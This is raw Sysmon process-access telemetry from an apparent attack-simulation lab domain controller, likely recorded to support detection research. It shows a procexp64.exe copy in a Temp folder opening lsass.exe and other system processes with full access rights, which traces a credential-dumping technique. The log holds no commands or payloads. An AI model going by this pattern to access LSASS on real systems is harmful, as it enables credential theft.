10341000x8000000000000000786906Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786905Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786904Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786903Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786902Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786901Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786900Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786899Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786898Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786897Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786896Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786895Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786894Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786893Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786892Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786891Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786890Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.627{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786889Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-3235-6010-C7A2-00000000A301}7020C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786888Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-3235-6010-C6A2-00000000A301}5144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786887Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786886Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786885Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786884Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786883Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2A79-6010-97A1-00000000A301}7040C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786882Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786881Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786880Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786879Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:06.424{732C744F-3235-6010-C4A2-00000000A301}48407348C:\Windows\system32\wbem\wmiprvse.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x8000000000000000786878Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 